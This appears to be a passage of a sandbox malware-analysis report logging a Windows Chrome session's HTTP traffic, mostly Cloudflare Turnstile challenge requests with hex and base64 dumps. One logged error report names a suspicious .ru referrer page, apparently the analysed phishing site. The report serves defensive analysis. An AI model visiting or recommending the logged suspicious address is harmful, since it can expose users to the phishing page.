                                                                Data Ascii: v_8fe714c69d748c29=8i7yeyUysyZyupHIpHtypdwKlhpOHlQCH-tHW56WIblHwdlK26bUHtH7dpLWkHo6HK2jLyO2HMyp2LpfNDWLHryNNPHn6HsnH7t%2bHxHbYUHbdp+iybTT2ayOdWmzdiLHmHNtMiFVSvNWGfxTqUf6W88NQOYNhMmOsIDuhMTPK66u8tonxOmHWtKttX4HHvCyHDDUtjNrh4L6HJHphHm6Wbl6HXHOLiyOsqpXo3HlQL
                                                                2025-01-07 21:36:06 UTC759INHTTP/1.1 200 OK
                                                                Date: Tue, 07 Jan 2025 21:36:06 GMT
                                                                Content-Type: text/plain; charset=UTF-8
                                                                Content-Length: 152832
                                                                Connection: close
                                                                cf-chl-gen: Qzzv5FA1KTWYVbvBg2B2J/96Piwh8kCkcHwph2cYA8+CrIyWlQc++GryNA4DaCe74ZVpX5Lyzw1iltx7aLnRKioT3yU+uHwB0hw0v+rRU7PX1AefrFiqLXauc0vRXNWtfJgmMYhjyxS7om5R+pdibmyykIw/kOiXzNcCsYO2U8AhAXJUgcnAM4bc9Z5hVdJxoYnpxgVCK+yasYNcgepvAVAQY9aluX21Rs+wu2XZ5UbBZyTZqoHqivetpVPC65zY9Dc+o+dwMWihFIsbZ5pyHKg2NMzXonor3SuHHe3+45iYHdQIk4iqbx6XMdPMy07JDUKrIg+eigEIP3pTEuqp5fsLaYtuGGu+Rg6RRgdfNDfKqoGWzEyIw88G4a7Xy1plRa4HOzzogCI5OsRZFSfWW95/SxJBiSV12iUDnCJQv14YYXXpGuisXJBrVKeuZ63+SCBaDTILS8drlP7ylPICFSH8Vvqe2jmAaek6OFob4rZFZIkOFljNRAmCCg==$r//uzGpSK1ML/5YW
                                                                Server: cloudflare
                                                                CF-RAY: 8fe714d69ce90c78-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                2025-01-07 21:36:06 UTC610INData Raw: 61 49 35 53 63 6f 61 63 63 4a 74 7a 6a 35 79 42 6a 6e 5a 36 68 49 4e 7a 6e 33 79 44 68 36 75 4a 6d 36 79 61 61 59 43 49 69 34 2b 33 64 4b 61 58 63 49 36 64 64 33 56 78 76 70 64 38 64 5a 50 47 67 4c 43 5a 6b 70 53 6c 6f 71 57 37 6e 62 76 53 71 70 75 74 71 4a 43 58 31 4a 50 52 6d 37 66 4a 6d 37 66 42 30 74 76 44 34 37 54 41 78 4d 6d 38 78 39 33 6e 74 63 65 6e 37 2b 50 73 72 4b 72 4e 71 4c 2f 54 72 36 7a 44 31 4e 4c 49 37 4f 37 52 7a 39 7a 53 77 74 63 45 31 64 37 30 36 2b 6b 4d 2b 67 58 68 35 4f 54 6e 34 75 41 50 37 75 50 59 7a 4d 33 6e 33 4e 51 4e 43 65 77 42 36 77 2f 31 34 2f 33 36 41 41 50 33 4c 64 2f 6f 43 41 6b 4c 48 43 49 53 44 77 4d 70 43 69 6b 6a 43 6a 41 79 48 2f 67 78 47 69 77 53 51 50 30 6b 42 67 4a 4a 49 78 59 57 4c 53 70 4a 43 79 42 48 49 69 6c
                                                                Data Ascii: aI5ScoaccJtzj5yBjnZ6hINzn3yDh6uJm6yaaYCIi4+3dKaXcI6dd3Vxvpd8dZPGgLCZkpSloqW7nbvSqputqJCX1JPRm7fJm7fB0tvD47TAxMm8x93ntcen7+PsrKrNqL/Tr6zD1NLI7O7Rz9zSwtcE1d706+kM+gXh5OTn4uAP7uPYzM3n3NQNCewB6w/14/36AAP3Ld/oCAkLHCISDwMpCikjCjAyH/gxGiwSQP0kBgJJIxYWLSpJCyBHIil
                                                                2025-01-07 21:36:06 UTC1369INData Raw: 68 68 54 6a 77 39 5a 54 31 41 57 44 63 6b 4e 55 5a 48 59 7a 31 49 55 57 74 6e 4a 32 31 4b 52 46 52 48 62 32 51 32 56 7a 64 76 64 58 6c 77 5a 46 56 66 68 47 5a 55 63 32 46 47 61 6f 6c 64 69 6b 39 71 6b 55 70 4d 68 31 52 6e 65 4a 4b 52 63 34 78 36 64 33 6c 37 67 59 79 44 66 31 31 6a 67 36 46 38 71 58 65 5a 68 59 31 6f 69 36 69 6b 6f 58 2b 31 71 57 71 32 75 37 46 37 72 72 39 2f 71 58 72 44 72 33 36 53 68 62 65 62 77 37 7a 4d 78 70 2f 4c 6d 4d 44 4c 78 62 47 76 68 36 43 52 79 4d 2b 59 71 4a 6d 32 74 4b 6a 57 6e 4e 2b 63 70 4d 2f 56 74 62 58 48 75 4e 76 64 75 73 2b 33 7a 73 37 4a 7a 63 65 39 73 75 72 47 73 73 32 79 2b 4d 2f 55 31 64 66 77 77 64 50 41 33 4e 76 68 42 51 4c 36 33 2f 62 62 33 64 33 49 44 4e 38 43 79 75 73 4f 36 51 73 51 38 41 34 4e 37 65 6a 52 49
                                                                Data Ascii: hhTjw9ZT1AWDckNUZHYz1IUWtnJ21KRFRHb2Q2VzdvdXlwZFVfhGZUc2FGaoldik9qkUpMh1RneJKRc4x6d3l7gYyDf11jg6F8qXeZhY1oi6ikoX+1qWq2u7F7rr9/qXrDr36Shbebw7zMxp/LmMDLxbGvh6CRyM+YqJm2tKjWnN+cpM/VtbXHuNvdus+3zs7Jzce9surGss2y+M/U1dfwwdPA3NvhBQL63/bb3d3IDN8CyusO6QsQ8A4N7ejRI
                                                                2025-01-07 21:36:06 UTC1369INData Raw: 6d 4a 45 42 6a 4e 53 4e 46 4b 44 6c 5a 55 33 52 79 54 56 4a 4d 59 6a 6c 6b 4f 31 59 7a 57 6a 74 53 66 33 39 4f 4f 33 70 53 67 6c 6c 69 64 6f 43 43 58 6b 56 2b 59 5a 42 70 6a 46 43 4c 5a 59 47 41 63 6f 61 51 6b 70 35 37 57 46 6c 62 65 5a 31 35 63 4a 32 52 64 33 46 39 6d 6e 31 37 70 6f 47 78 67 49 53 4b 62 49 61 74 63 72 57 48 6a 4b 61 37 6b 62 5a 34 71 59 36 53 76 49 53 55 76 70 43 43 6c 5a 71 49 75 4d 54 47 78 74 47 67 71 36 37 52 79 63 71 6c 7a 71 7a 43 79 4c 7a 61 6c 4b 6a 4f 76 4e 76 5a 6f 4c 75 37 72 37 43 39 34 63 6e 6b 33 4c 76 49 70 73 4f 39 76 65 37 76 38 36 2f 59 38 4d 7a 4b 2b 76 6e 71 31 2f 54 79 2b 38 45 45 78 41 6a 5a 42 39 76 35 31 74 51 4f 44 39 33 39 7a 63 76 4b 38 2b 66 79 36 77 49 54 30 67 38 62 44 4f 72 37 36 66 72 64 44 50 48 38 34 51
                                                                Data Ascii: mJEBjNSNFKDlZU3RyTVJMYjlkO1YzWjtSf39OO3pSgllidoCCXkV+YZBpjFCLZYGAcoaQkp57WFlbeZ15cJ2Rd3F9mn17poGxgISKbIatcrWHjKa7kbZ4qY6SvISUvpCClZqIuMTGxtGgq67RycqlzqzCyLzalKjOvNvZoLu7r7C94cnk3LvIpsO9ve7v86/Y8MzK+vnq1/Ty+8EExAjZB9v51tQOD939zcvK8+fy6wIT0g8bDOr76frdDPH84Q
                                                                2025-01-07 21:36:06 UTC1369INData Raw: 53 46 67 6a 53 57 31 51 58 7a 42 43 59 7a 68 6e 52 55 31 62 62 32 70 53 67 56 5a 34 67 47 4e 2b 50 58 6d 48 65 6b 4b 49 69 49 35 35 66 6f 56 67 68 56 47 44 6a 57 74 58 68 31 70 33 61 70 71 4d 58 6c 75 51 57 58 5a 32 67 33 46 6c 6c 57 4a 71 5a 33 61 45 62 6f 61 4e 6f 4c 42 2b 6f 61 71 75 74 70 53 57 75 4b 65 50 65 4c 6d 32 72 33 70 39 66 6e 61 62 72 70 4f 46 71 59 47 33 6c 73 61 6e 6f 4c 32 77 77 4b 6a 51 30 36 62 48 74 5a 57 6c 71 4e 71 75 76 71 72 58 7a 39 79 76 7a 38 53 68 76 37 53 68 36 62 6d 65 36 75 69 6f 71 4d 50 44 34 50 57 39 30 75 50 45 39 75 6a 46 79 4e 48 63 7a 4e 66 73 76 51 4f 38 2f 51 50 42 31 74 63 4c 36 4d 72 32 79 77 66 64 34 77 58 2b 34 74 38 46 45 63 34 50 2b 4f 55 5a 36 50 59 50 36 42 67 62 37 53 4c 74 37 76 62 39 47 67 73 6d 4c 51 45
                                                                Data Ascii: SFgjSW1QXzBCYzhnRU1bb2pSgVZ4gGN+PXmHekKIiI55foVghVGDjWtXh1p3apqMXluQWXZ2g3FllWJqZ3aEboaNoLB+oaqutpSWuKePeLm2r3p9fnabrpOFqYG3lsanoL2wwKjQ06bHtZWlqNquvqrXz9yvz8Shv7Sh6bme6uioqMPD4PW90uPE9ujFyNHczNfsvQO8/QPB1tcL6Mr2ywfd4wX+4t8FEc4P+OUZ6PYP6Bgb7SLt7vb9GgsmLQE
                                                                2025-01-07 21:36:06 UTC1369INData Raw: 30 45 77 54 55 31 4a 51 32 31 70 4f 58 45 38 58 6e 35 52 64 31 5a 55 62 33 78 5a 58 30 52 2f 58 57 4e 47 68 58 46 6f 58 49 68 6d 63 47 46 51 6b 59 71 53 66 46 6d 50 6c 32 32 4d 58 32 47 66 67 4a 6c 30 67 48 35 38 70 70 71 6c 66 5a 75 59 6a 70 4f 6a 6e 49 79 4e 71 49 65 53 74 36 6d 7a 75 34 36 4f 66 62 42 2f 6f 6f 4b 56 67 62 33 48 6f 70 65 6c 69 37 61 6f 76 4d 76 4a 70 4d 72 50 7a 63 4c 49 30 4e 47 34 79 4c 79 34 79 4a 36 67 32 4c 69 2b 6e 4c 53 2b 32 4c 6e 45 79 37 69 2f 75 4d 37 74 77 73 76 4f 38 4b 2b 74 35 65 44 45 30 4d 4c 62 39 4e 36 77 31 38 2f 4d 7a 4c 7a 67 35 4e 72 76 30 50 76 5a 2b 77 50 4c 32 41 4d 4c 2b 67 73 48 45 65 6a 77 30 78 51 54 34 78 77 5a 42 39 6f 66 37 4f 6f 65 44 65 41 50 4a 79 51 67 35 76 51 63 4b 68 67 76 4c 43 34 63 37 79 55 79
                                                                Data Ascii: 0EwTU1JQ21pOXE8Xn5Rd1ZUb3xZX0R/XWNGhXFoXIhmcGFQkYqSfFmPl22MX2GfgJl0gH58ppqlfZuYjpOjnIyNqIeSt6mzu46OfbB/ooKVgb3Hopeli7aovMvJpMrPzcLI0NG4yLy4yJ6g2Li+nLS+2LnEy7i/uM7twsvO8K+t5eDE0MLb9N6w18/MzLzg5Nrv0PvZ+wPL2AML+gsHEejw0xQT4xwZB9of7OoeDeAPJyQg5vQcKhgvLC4c7yUy
                                                                2025-01-07 21:36:06 UTC1369INData Raw: 52 6f 50 46 42 76 50 33 70 77 62 6e 5a 39 50 31 53 41 63 32 52 2f 6a 59 53 42 57 57 35 6e 5a 46 42 76 64 6d 68 52 57 58 46 79 6d 6f 64 31 61 56 64 54 6e 6f 52 65 64 46 32 69 65 58 52 6c 5a 6f 43 4b 61 61 36 47 6f 57 79 73 68 59 43 7a 73 36 2b 71 69 5a 6d 53 68 70 32 53 64 72 36 4e 69 36 79 65 67 4c 43 38 77 72 66 41 68 38 71 2f 67 59 2f 51 77 39 53 4b 71 38 44 4f 31 71 37 4f 71 37 53 6d 79 5a 36 67 34 74 7a 53 31 72 61 69 6e 71 58 64 71 74 37 69 76 62 76 49 7a 72 33 44 76 38 2f 50 78 38 7a 52 37 4d 62 53 36 76 54 72 30 63 6a 35 75 75 50 37 2b 2f 73 46 42 77 54 43 76 51 62 32 44 38 55 51 41 67 51 50 37 65 55 52 43 67 4d 53 7a 41 54 34 47 67 77 62 34 4e 77 63 48 52 6b 52 4a 74 2f 37 41 67 55 41 49 53 73 42 42 67 72 35 44 79 73 6e 4c 52 38 69 4a 50 49 62 4b
                                                                Data Ascii: RoPFBvP3pwbnZ9P1SAc2R/jYSBWW5nZFBvdmhRWXFymod1aVdTnoRedF2ieXRlZoCKaa6GoWyshYCzs6+qiZmShp2Sdr6Ni6yegLC8wrfAh8q/gY/Qw9SKq8DO1q7Oq7SmyZ6g4tzS1rainqXdqt7ivbvIzr3Dv8/Px8zR7MbS6vTr0cj5uuP7+/sFBwTCvQb2D8UQAgQP7eURCgMSzAT4Ggwb4NwcHRkRJt/7AgUAISsBBgr5DysnLR8iJPIbK
                                                                2025-01-07 21:36:06 UTC1369INData Raw: 74 50 56 70 52 56 34 6c 5a 51 31 4e 72 52 34 35 42 69 6c 78 75 6a 56 4a 67 59 56 4b 4c 64 6e 42 6d 6e 5a 65 4c 6d 6e 4a 70 63 58 56 66 67 49 47 6a 67 47 53 69 5a 49 6d 66 65 4b 65 4e 65 35 75 67 6a 6f 61 45 6d 4b 61 69 70 71 61 72 62 34 69 6f 77 4b 48 43 74 6f 4f 69 6e 6f 61 61 77 36 4a 39 78 70 79 74 75 5a 75 36 30 63 48 50 6b 62 4b 4e 73 38 75 72 72 61 61 71 70 37 75 74 6b 36 4b 62 77 2b 4f 65 36 4b 66 45 77 74 58 74 77 65 58 70 71 4d 58 43 37 71 7a 71 35 72 66 72 31 76 58 6a 75 4e 58 34 34 4f 76 5a 75 39 59 46 2b 64 61 35 32 2b 4c 63 2b 77 6a 5a 37 50 33 4f 41 68 44 4a 45 65 67 58 30 4d 38 45 47 65 6f 53 35 52 6e 78 2b 66 7a 34 39 68 6b 69 4a 69 55 64 49 4e 77 62 43 51 48 33 4c 67 55 70 35 43 4c 71 4e 42 41 46 4d 53 6a 35 48 43 55 76 45 7a 49 2b 51 6a
                                                                Data Ascii: tPVpRV4lZQ1NrR45BilxujVJgYVKLdnBmnZeLmnJpcXVfgIGjgGSiZImfeKeNe5ugjoaEmKaipqarb4iowKHCtoOinoaaw6J9xpytuZu60cHPkbKNs8urraaqp7utk6Kbw+Oe6KfEwtXtweXpqMXC7qzq5rfr1vXjuNX44OvZu9YF+da52+Lc+wjZ7P3OAhDJEegX0M8EGeoS5Rnx+fz49hkiJiUdINwbCQH3LgUp5CLqNBAFMSj5HCUvEzI+Qj
                                                                2025-01-07 21:36:06 UTC1369INData Raw: 57 33 39 36 56 59 4a 65 61 48 78 4d 63 6f 79 4e 55 70 47 45 55 58 64 31 61 6e 42 6f 61 48 53 59 57 4a 79 51 67 32 2b 6b 70 4b 6c 70 6c 4a 32 69 69 33 79 69 6e 49 4e 78 69 34 46 78 73 35 57 75 6c 6f 32 61 6d 62 5a 78 6e 6f 79 62 6b 61 4f 68 78 38 47 61 79 73 6d 71 6c 4c 2b 32 79 37 6d 37 6e 71 36 6a 6e 72 4c 44 6f 74 65 61 78 38 57 56 72 4a 2b 2f 30 36 37 44 77 37 62 57 77 61 50 41 71 64 2f 42 72 4c 6e 61 78 38 7a 6a 73 4c 48 4e 76 73 50 53 74 76 58 63 79 38 6a 4d 79 76 48 51 2f 73 2f 59 2b 4f 54 31 36 41 54 38 33 74 63 4d 36 73 77 4a 43 78 4c 70 38 41 30 4c 42 4e 45 62 35 4e 73 59 45 50 67 42 44 52 48 61 33 50 41 5a 34 76 73 54 42 52 66 39 49 4f 6f 41 4d 42 6b 66 38 51 63 69 42 2f 4d 6a 4a 78 48 30 48 44 59 66 2b 7a 42 43 2b 67 77 79 4d 43 51 56 48 69 6f
                                                                Data Ascii: W396VYJeaHxMcoyNUpGEUXd1anBoaHSYWJyQg2+kpKlplJ2ii3yinINxi4Fxs5Wulo2ambZxnoybkaOhx8GaysmqlL+2y7m7nq6jnrLDoteax8WVrJ+/067Dw7bWwaPAqd/BrLnax8zjsLHNvsPStvXcy8jMyvHQ/s/Y+OT16AT83tcM6swJCxLp8A0LBNEb5NsYEPgBDRHa3PAZ4vsTBRf9IOoAMBkf8QciB/MjJxH0HDYf+zBC+gwyMCQVHio
                                                                2025-01-07 21:36:06 UTC1369INData Raw: 57 36 4e 69 5a 4a 75 54 32 56 57 59 56 65 53 57 56 4e 5a 63 61 46 67 64 4b 4a 30 6e 49 4a 76 6c 4a 2b 54 6f 61 43 4e 62 47 32 68 70 4b 32 48 73 5a 47 31 6a 35 43 79 72 59 57 36 6e 72 4a 78 66 72 32 56 73 6f 52 33 74 37 61 49 78 37 65 37 69 73 71 2f 76 59 32 6e 6f 59 32 4c 71 49 6a 41 30 34 76 62 31 35 4b 31 6e 4e 4b 65 33 63 76 66 6e 35 75 64 74 71 66 58 76 65 61 6b 34 63 43 76 34 38 37 64 31 4e 2f 42 77 61 33 49 73 38 50 37 33 4e 37 58 75 2b 33 32 30 37 33 6b 35 64 73 49 38 39 66 58 2f 65 41 47 77 41 50 39 38 50 33 6e 30 67 51 53 46 50 51 55 38 77 38 47 36 4f 2f 36 47 4f 73 57 48 42 49 63 48 67 59 42 34 79 44 68 4a 79 59 46 4d 4f 4c 74 4a 4f 34 79 45 50 45 75 49 66 49 76 39 67 67 75 4d 7a 4d 76 49 53 41 67 4e 77 45 65 4f 44 31 48 4a 55 77 4e 4f 7a 73 61
                                                                Data Ascii: W6NiZJuT2VWYVeSWVNZcaFgdKJ0nIJvlJ+ToaCNbG2hpK2HsZG1j5CyrYW6nrJxfr2VsoR3t7aIx7e7isq/vY2noY2LqIjA04vb15K1nNKe3cvfn5udtqfXveak4cCv487d1N/Bwa3Is8P73N7Xu+32073k5dsI89fX/eAGwAP98P3n0gQSFPQU8w8G6O/6GOsWHBIcHgYB4yDhJyYFMOLtJO4yEPEuIfIv9gguMzMvISAgNwEeOD1HJUwNOzsa


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                16192.168.2.164973835.190.80.14437780C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-07 21:36:06 UTC474OUTPOST /report/v4?s=iiKpM3n5M0fDNFnrDcDsMdQtkaIjKmToRccg3viDHjNqN2XOzqX88%2FevpVitsfcfzvfW4rw3Mj8Ssv5w8%2FulVhzXQNf5iKkZCM0tl4XQVNCBSNUBj3pu56sR4ZbU3w%3D%3D HTTP/1.1
                                                                Host: a.nel.cloudflare.com
                                                                Connection: keep-alive
                                                                Content-Length: 435
                                                                Content-Type: application/reports+json
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2025-01-07 21:36:06 UTC435OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 37 30 30 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 73 75 6e 67 2e 65 74 68 61 6d 6f 73 6b 61 67 2e 72 75 2f 30 63 55 72 63 77 33 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 37 32 2e 36 37 2e 32 30 36 2e 31 31 34 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72
                                                                Data Ascii: [{"age":0,"body":{"elapsed_time":700,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://sung.ethamoskag.ru/0cUrcw3/","sampling_fraction":1.0,"server_ip":"172.67.206.114","status_code":404,"type":"http.error"},"type":"network-er
                                                                2025-01-07 21:36:06 UTC168INHTTP/1.1 200 OK
                                                                Content-Length: 0
                                                                date: Tue, 07 Jan 2025 21:36:06 GMT
                                                                Via: 1.1 google
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                17192.168.2.1649739104.18.95.414437780C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-07 21:36:07 UTC599OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/1702680241:1736281743:oHkGzRQEm0XBvPLraYKhN6D7o1wYu-qyAvxbR8tTHnY/8fe714c69d748c29/D9FHRl2BpZjliNMgDyuZOYbu5d2HtaznsinZzmz5MBU-1736285763-1.1.1.1-HKIOzuGxr_aQvzCfppdTbPN_zP_Hq18hKmQyJT3mFLCaJY32a.duvmYyY6NCi1it HTTP/1.1
                                                                Host: challenges.cloudflare.com
                                                                Connection: keep-alive
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Accept: */*
                                                                Sec-Fetch-Site: none
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Dest: empty
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2025-01-07 21:36:07 UTC379INHTTP/1.1 404 Not Found
                                                                Date: Tue, 07 Jan 2025 21:36:07 GMT
                                                                Content-Type: application/json
                                                                Content-Length: 7
                                                                Connection: close
                                                                cf-chl-out: 4gbT4mhqn6utbdIk2uE3PM7Id1vMzXY045s=$tIx11G/KRSXaMRyB
                                                                cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                Server: cloudflare
                                                                CF-RAY: 8fe714dcd823729b-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                2025-01-07 21:36:07 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                Data Ascii: invalid


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                18192.168.2.1649740104.18.95.414437780C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-07 21:36:07 UTC782OUTGET /cdn-cgi/challenge-platform/h/g/i/8fe714c69d748c29/1736285766203/aPZ_CcXDlBoyNcS HTTP/1.1
                                                                Host: challenges.cloudflare.com
                                                                Connection: keep-alive
                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                sec-ch-ua-mobile: ?0
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                sec-ch-ua-platform: "Windows"
                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                Sec-Fetch-Site: same-origin
                                                                Sec-Fetch-Mode: no-cors
                                                                Sec-Fetch-Dest: image
                                                                Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/nrw71/0x4AAAAAAA1mOjQlyo8gEN4C/auto/fbE/normal/auto/
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2025-01-07 21:36:07 UTC200INHTTP/1.1 200 OK
                                                                Date: Tue, 07 Jan 2025 21:36:07 GMT
                                                                Content-Type: image/png
                                                                Content-Length: 61
                                                                Connection: close
                                                                Server: cloudflare
                                                                CF-RAY: 8fe714df2ff0de96-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                2025-01-07 21:36:07 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 38 00 00 00 57 08 02 00 00 00 de 46 11 c6 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                Data Ascii: PNGIHDR8WFIDAT$IENDB`


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                19192.168.2.1649741104.18.95.414437780C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-07 21:36:08 UTC428OUTGET /cdn-cgi/challenge-platform/h/g/i/8fe714c69d748c29/1736285766203/aPZ_CcXDlBoyNcS HTTP/1.1
                                                                Host: challenges.cloudflare.com
                                                                Connection: keep-alive
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Accept: */*
                                                                Sec-Fetch-Site: none
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Dest: empty
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2025-01-07 21:36:08 UTC200INHTTP/1.1 200 OK
                                                                Date: Tue, 07 Jan 2025 21:36:08 GMT
                                                                Content-Type: image/png
                                                                Content-Length: 61
                                                                Connection: close
                                                                Server: cloudflare
                                                                CF-RAY: 8fe714e4a8cc440c-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                2025-01-07 21:36:08 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 38 00 00 00 57 08 02 00 00 00 de 46 11 c6 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                Data Ascii: PNGIHDR8WFIDAT$IENDB`


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                20192.168.2.1649742104.18.95.414437780C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-07 21:36:08 UTC811OUTGET /cdn-cgi/challenge-platform/h/g/pat/8fe714c69d748c29/1736285766207/49c14c3b2e7a23b87f706815c596ec9ea68094171ae7dafa90c98c13a88b7c48/smJmz9q7H4detGh HTTP/1.1
                                                                Host: challenges.cloudflare.com
                                                                Connection: keep-alive
                                                                Cache-Control: max-age=0
                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                sec-ch-ua-mobile: ?0
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                sec-ch-ua-platform: "Windows"
                                                                Accept: */*
                                                                Sec-Fetch-Site: same-origin
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Dest: empty
                                                                Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/nrw71/0x4AAAAAAA1mOjQlyo8gEN4C/auto/fbE/normal/auto/
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2025-01-07 21:36:08 UTC143INHTTP/1.1 401 Unauthorized
                                                                Date: Tue, 07 Jan 2025 21:36:08 GMT
                                                                Content-Type: text/plain; charset=utf-8
                                                                Content-Length: 1
                                                                Connection: close
                                                                2025-01-07 21:36:08 UTC2015INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 53 63 46 4d 4f 79 35 36 49 37 68 5f 63 47 67 56 78 5a 62 73 6e 71 61 41 6c 42 63 61 35 39 72 36 6b 4d 6d 4d 45 36 69 4c 66 45 67 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
                                                                Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20gScFMOy56I7h_cGgVxZbsnqaAlBca59r6kMmME6iLfEgAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                                                                2025-01-07 21:36:08 UTC1INData Raw: 4a
                                                                Data Ascii: J


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                21192.168.2.1649743104.18.95.414437780C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-07 21:36:09 UTC1172OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/1702680241:1736281743:oHkGzRQEm0XBvPLraYKhN6D7o1wYu-qyAvxbR8tTHnY/8fe714c69d748c29/D9FHRl2BpZjliNMgDyuZOYbu5d2HtaznsinZzmz5MBU-1736285763-1.1.1.1-HKIOzuGxr_aQvzCfppdTbPN_zP_Hq18hKmQyJT3mFLCaJY32a.duvmYyY6NCi1it HTTP/1.1
                                                                Host: challenges.cloudflare.com
                                                                Connection: keep-alive
                                                                Content-Length: 32114
                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                Content-type: application/x-www-form-urlencoded
                                                                CF-Chl-RetryAttempt: 0
                                                                sec-ch-ua-mobile: ?0
